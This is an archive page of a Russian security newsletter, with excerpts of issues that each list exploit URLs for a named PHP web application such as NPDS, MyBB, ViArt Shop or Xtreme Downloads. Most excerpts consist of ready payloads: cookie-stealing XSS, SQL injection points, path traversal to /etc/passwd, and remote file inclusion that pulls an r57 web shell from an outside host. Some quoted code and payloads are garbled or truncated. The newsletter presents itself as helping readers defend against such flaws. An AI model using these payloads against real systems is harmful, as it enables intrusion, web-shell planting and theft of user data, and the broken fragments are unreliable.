Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
| ← Август 2025 | ||||||
|
1
|
2
|
3
|
||||
|---|---|---|---|---|---|---|
|
4
|
5
|
6
|
7
|
8
|
9
|
10
|
|
11
|
12
|
13
|
14
|
15
|
16
|
17
|
|
18
|
19
|
20
|
21
|
22
|
23
|
24
|
|
25
|
26
|
27
|
28
|
29
|
30
|
31
|
В наше время взломы сайтов, форумом и чатов стали привычном делом. Для тех кто хочет знать почему это происходит и как этому противостоять и существует наша рассылка.
Статистика
-1 за неделю
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в NPDS.
Компьютер для продвинутых пользователей В этом выпуске: NPDS ПО: NPDS Версия: 5.10 Сайт: www.npds.org Использование: http://]/header.php?Default_Theme./apache/logs/error.log%00 http://]/modules/cluster-paradise/cluster-E.php?ModPath./././././apache/logs/error.log%00 // http://]/header.php?Titlesitename=<script>alert(document.cookie)</script> http://]/header.php?sitename><script>alert(document.cookie)</script> http://]/meta/meta.php?nuke_url><script>alert(document.cookie)</script> http://]...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Mafia Moblog.
Компьютер для продвинутых пользователей В этом выпуске: Mafia Moblog ПО: Mafia Moblog Версия: 6 Уязвимость: Введите в параметр 'img' на "big,php" не проверяется до использования в SQL-запросе. Это может быль использоваться для проведения SQL-запросов. Уязвимый код в 'templates/match plus/big.php' : * 52 $query = "SELECT * FROM $table WHERE id$img"; 53 $result = mysql_query$query); 54 $row = mysql_fetch_row$result); * Использование: http://localhost//moblog/big.php?img[SQL]...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в i.List.
Компьютер для продвинутых пользователей В этом выпуске: i.List ПО: i.List Версия: 1.5 Сайт: http://skoom.de Уязвимость: Ввод в поле текста 'URL' в файл "search.php" и 'ButtonURL' в "add.php не проверяется и не фильтруется до использования. Это позволяет провести XSS атаку на сервер. Использование: В любое поле вставьте код: <script>alert"MajorSecurity)</script. Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 27...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в ViArt Shop.
Компьютер для продвинутых пользователей В этом выпуске: ViArt Shop ПО: ViArt Shop Версия: 2.5.5 Сайт: http://www.codetosell.com/ Использование: /forum.php?forum_id><script>alert'XSS);</script>&category_id=1 /reviews.php?category_id=0&item_id=4&rnd=1149618267&action=1&item_id><scri pt>alert'XSS);</script>...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в aWebNews.
Компьютер для продвинутых пользователей В этом выпуске: aWebNews ПО: aWebNews Версия: 1.0 Уязвимость: Уязвимость позволяет читать любые файлы пользователя. Баг заключается в ошибке кода в login.php: - start - if _GET'page] = ) { $pagetogo = "index.php"; } else { $pagetogo = _GET'page]; } - end - Использование: Откройте браузер на: http://example.org/aWebNews/login.php?page=/aWebNews/[some file] Теперь введите логин и пароль, нажмите enter. теперь вы можете читать [some files] в директории программы. Не заб...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в MyBB.
Компьютер для продвинутых пользователей В этом выпуске: MyBB ПО: MyBB Версия: 1.1.2 Использование: /mybb/private.php?to=asda&subject=asd%3E&font-&size-&color-&mode=advanced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&action=do_send&pmid=&do=D3vil-0x1%22%3E%3Cscript%3Ealert(1);%3C/script%3E...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в GANTTy.
Компьютер для продвинутых пользователей В этом выпуске: GANTTy ПО: GANTTy Версия: 1.0.3 Сайт: http://www.gantty.com Использование: http://www.example.com/index.php?action=login&message=<IMG SRC=javascript:alert'XSS+email...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Partial Links.
Компьютер для продвинутых пользователей В этом выпуске: Partial Links ПО: Partial Links Версия: 1.2.2 Сайт: http://www.particlesoft.net/particlelinks/ Использование: http://www.example.com/Other_Sites/X%2526_Y/./././././etc/passwd/ http://www.example.com/index.php?topic[SQL] http://www.example.com/includes/page_footer.php Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Particle Gallery.
Компьютер для продвинутых пользователей В этом выпуске: Particle Gallery ПО: Particle Gallery Версия: 1.0.0 Сайт: http://www.particlesoft.net/particlegallery/ Использование: http://www.example.com/viewimage.php?imageid[SQL] http://www.example.com/viewimage.php?imageid=<iframe%20src=http://evilsite.com/scriptlet.html> http://www.example.com/viewalbum.php?albumid././././etc/passwd / Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можн...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Xtreme Downloads.
Компьютер для продвинутых пользователей В этом выпуске: Xtreme Downloads ПО: Xtreme Downloads Версия: 1.0 Использование: http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt? http://www.example.com/path/manager.php?root=http://yoursite/r57shell.txt? http://www.example.com/path/admin\scripts/category.php?root=http://yoursite/r57shell.txt? http://www.example.com/path/includes/add_allow.php?root=http://yoursite/r57shell.txt? Не забудьте проголосовать за выпуск! Рассылка создана и ведется...
